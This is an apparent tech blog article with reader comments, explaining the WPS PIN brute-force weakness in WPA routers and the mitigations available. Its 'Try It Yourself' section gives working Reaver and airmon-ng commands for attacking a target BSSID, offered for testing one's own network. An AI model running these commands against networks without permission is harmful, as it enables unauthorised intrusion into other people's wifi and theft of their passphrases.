Pinterest MobileAppPage Stumbleupon Whatsapp
Ads by Google

By now, we should all be aware of the dangers of securing networks with WEP, which I demonstrated before how you could hack in 5 minutes How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is We’re constantly telling you that using WEP to 'secure' your wireless network is really a fools game, yet people still do it. Today I’d like to show you exactly how insecure WEP really is, by... Read More . The advice has always been to use WPA or WPA2 to secure your network, with a long password that couldn’t be hacked by brute force.

Well, it turns out there’s a significant backdoor in most routers that can be exploited – in the form of a technology called WPS. Read on to find out how the hack works, how to test your own network, and what you can do to prevent it.


WPA itself is quite secure. The passphrase can only be broken through brute force, so it’s only realistically hackable if you’ve chosen a weak single-word passphrase.

WPS on the other hand is a technology built into most wifi routers that allows you to easily bypass the WPA password by either using a physical PIN that’s written on the side of the router, or a button that you can press on both devices in order to pair them.

It turns out that the WPS PIN – a measly 8 digit numeric code – is very much vulnerable to brute force attacks. Assuming a susceptible router and good signal, the WPS PIN can be hacked in as little as 2 hours. Once the WPS PIN is obtained, the WPA passphrase is also revealed.

Ads by Google

Reaver, released by Craig Heffner and available to download on Google Code, is a practical implementation that you can point and shoot at viable networks. Here’s a video of it in action (skip to the end if you want to just see the entire passphrase revealed to the attacker):

Stefan Viehböck also discovered the same vulnerability independently and has released a similar tool which you can download. Here’s a video of Stefan’s app in action:

Mitigating the Attack

There are a few methods of mitigating the attack. The first is to completely disable the WPS option on your router. Unfortunately, this isn’t possible on every router and is usually enabled by default, so non-tech savvy users are susceptible here.

Not only that, but I found that on my router, the option to DISABLE WPS PIN didn’t actually disable the PIN that written on the side of the router – only the user-defined PIN. I quote:

When it’s disabled, users still can add a wireless client through WPS with either Push Button or PIN Number method.

So in some cases, it seems this is a permanent backdoor that cannot be mitigated by user settings alone.

A second option is to disable the wireless network entirely on susceptible devices, though obviously this isn’t going to be a viable option for most users who need the wifi functionality for laptops and mobile devices.

Advanced users among you may be thinking at this point about MAC address filtering to set up a list of specific devices allowed to join the network – but this can be easily circumvented by faking the MAC address of an allowed device.

Finally, devices can initiate a lock out when successive failed attempts are detected. This does not completely mitigate an attack, but does increase the time needed to complete it significantly. I believe Netgear routers have an automatic 5 minute block built-in, but in my testing this only increased the attack time required to about a day at most.

A firmware update could increase the time for which devices are blocked, thereby exponentially increasing the total time needed for an attack), but this would need to be either user-initiated (unlikely for most users) or performed automatically when the router restarts (as is often the case with cable services).

Try It Yourself

For those who wish to test their own home setups for the vulnerability, you can obtain the latest code from the Reaver project on Google Code. You’ll need some flavour of Linux to test it on (I suggest Backtrack), as well as a card that allows for promiscuous wifi monitoring and the appropriate drivers/aircrack software suite. If you were able to follow my last tutorial on WEP cracking How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is We’re constantly telling you that using WEP to 'secure' your wireless network is really a fools game, yet people still do it. Today I’d like to show you exactly how insecure WEP really is, by... Read More , this will work too.

After downloading the package, navigate to the directory and type (replacing XXXX with the current version number, or remember you can press TAB to have the console auto-complete the command for you with matching filename):

tar -xvf reaver-XXXXX.tar.gz 
cd reaver-XXXX/src
make install
airmon-ng start wlan0

You should see something about a mon0 interface being created. To scan for suitable networks, use:

walsh -i mon0

and to begin the reaver attack, type (replaced BSSID with the hexadecimal BSSID of the target network):

reaver -i mon0 -b BSSID -vv -d 0 --ignore-locks

It goes without saying that this would be a serious wire fraud criminal offence to perform on any network for which you don’t have explicit permission to test on.


Be sure to check out the Reaver wiki for a more fuller FAQ. The most common problem I found was either too weak a signal, meaning a full WPS handshake could never be completed, or the same PIN being repeated along with a timeout – this was due to the router 5 minute lockout.

I left the software running though, and after some time it would try some more PINs, until my home network was broken in under 8 hours, and the 20 aalphanumeric, mixed punctuation passphrase I had diligently set was revealed onscreen.

Should You Be Worried?

This is still very much a new attack, but it’s important you’re aware of the dangers and know how to protect yourself. If you find your router is vulnerable, and have a support number to call, I would suggest you ask them how long it will be until a suitable firmware update is available, or how you can go about the upgrade process if it is available already.

Some users will be able to easily prevent this attack with a simple setting alteration, but for the vast numbers of routers in use this is a permanent backdoor for which only a firmware update is going to mitigate somewhat.

Let us know in the comments if you have any questions or managed to try this on your own wifi.

  1. John Lee
    December 24, 2016 at 8:22 am

    I am in a fued with my property manager ain a condo complex. We have gated community and fobs to get in the doors and gates. So they can always tell when I'm leaving or coming back ( not to mention perimeter alarms) but that's another story. All the floors go thru my bottom floor wall where there is an access panel to. I have noticed some weird wiring in the panel (blank faceplatell is all) it has resistors on two of the 4 floops. Or sets of prs if yo will is this normal for data wiring between routers and or gateways? Any help is apprecited.

  2. tom
    March 14, 2015 at 10:30 pm

    Doesn't work well anymore. most routers lock after 3 bad pin attempts. I had a netgear I tried this on and had no luck with it. However I tried it on a Motorola SBG 6580 and it got the pin, but it took 6 hours and I was 5 feet from the router.
    There are several other tools which have been released that work similar, Bully and wpspin with Kali Linux come to mind, but reaver works the best if you use the options.
    It is basically hit or miss, but these I have found these tools only get results on about 1 or 2 out of 10 routers.

  3. Joseph Zajdler
    May 27, 2012 at 4:21 pm

    Wait A Minute. Was anyone tried this? Even if you take 2-10 hours to find my 8 digit pin, what's next? Are you going to camp outside my house for months until I press the button on my router?

    • muotechguy
      May 27, 2012 at 4:34 pm

      Not necessary. All the attacker needs is that 8 digit PIN. Yes, I tried.

  4. Oliver @ VPS Hosting
    January 25, 2012 at 1:17 am

    How interesting it is, I have my close friend just nearby my house that have Wi-fi that is not quite secure. He did not even put password and its WPS is enabaled.

  5. Fried Rice
    January 19, 2012 at 6:10 pm

    set your connection to be hidden. problem solved...?

    • James Bruce
      January 19, 2012 at 7:06 pm

      Nope. Hidden is only hidden from windows and mac wifi list. Airodump will find them all. The attack uses BSSID , not ESID (which is what is hidden). 

    • kav
      April 23, 2012 at 9:03 am


  6. Anthony Boone
    January 15, 2012 at 1:18 am

    Awesome article. Super informative. Thank you for the how-to, as well!

  7. Anonymous
    January 10, 2012 at 4:13 pm

    Holy crap! My dad had recently bought a Samsung printer which advertised one click wireless setup using WPS. I had never heard of it before, but to be honest I did wonder how they did that and I smelt something fishy. Luckily, it never did work, so I guess we don't have WPS, but I will have to check that. Thanks a lot for this article, could have saved me from a malicious attack.

    • James Bruce
      January 11, 2012 at 9:04 am

      Definitely check that out. Even if the button doesn't work (I could never get my printer to work like that either, gave up and used an ethernet cable instead) - WPS pin may still be enabled (and unable to be disabled). If you have a suitable wifi card, download backtrack and try for yourself, thats the only reliable way to check really. Good luck!

  8. kD DeShane
    January 7, 2012 at 5:27 am

    Thanks for the article. I recently got into an argument about password sensitivity/security on a family member's router. Obviously, I am horrible at explaining the whys and hows because her reply was "Who in this neighborhood knows I have a son/daughter named xxxxxxx?" Perfect article to send to such relatives who can't seem to understand the importance of basic password security on not just banking websites, but nowadays, on the hardware itself!

    • James Bruce
      January 7, 2012 at 9:24 am

      Lol. I would direct them toward this site to test their password choice, which explain how long it would take to brute force hack it:

  9. Asa
    January 6, 2012 at 9:31 pm

    It's been years since I bought a router,.. I didn't realize they had a PIN number connection method.  Wouldn't the repercussions of this be obvious to the designers???  Shameful.  Another issue I have noticed in modern routers is a PNP configuration feature (it may be called something else), where recent version of Windows (and possibly Mac/Linux) will detect that the router has not been configured yet, and bring up the config page where you can set your passphrase, etc.  I have noticed routers that were never configured (the owners may be using older OS versions or just don't know what to do when the prompt comes up so cancel or ignore it).  There has got to be a better solution to help the less technically inclined have (somewhat) secure networks.

    • James Bruce
      January 7, 2012 at 9:29 am

      Hmm, I haven't come across that, but I don't configure many routers to be honest. 

      It was incredibly irresponsible of someone to put PINs on routers, indeed. I really can't understand the logic of setting up an elaborate password, then making 8 numbers to completely bypass it. I believe this was actually defined in the various wifi standards documents though, rather than router manufacturers themselves. 

  10. Joel Lee
    January 6, 2012 at 8:48 pm

    It's interesting to me that it took this long to exploit what seems to be an incredibly simple vulnerability.

    I don't have much experience with wireless hardware, so maybe this is a dumb question: would it be possible to mitigate the attack by disabling the SSID broadcast? If the hacker doesn't know your network exists, they can't hack it, right? Or can they sniff it out somehow?

    • James Bruce
      January 6, 2012 at 9:19 pm

      Very easy to detect I'm afraid, the BSSID is still broadcast, and that's all that's needed for this or any hacks. SSID hiding really only mitigates against people seeing the network in simple windows/Mac wifi scan.

      You're right, it is odd it's taken so long to discover this - and then two people discover it at exactly the same time!

  11. Anonymous
    January 6, 2012 at 8:10 pm

    Great Article :)

Leave a Reply

Your email address will not be published. Required fields are marked *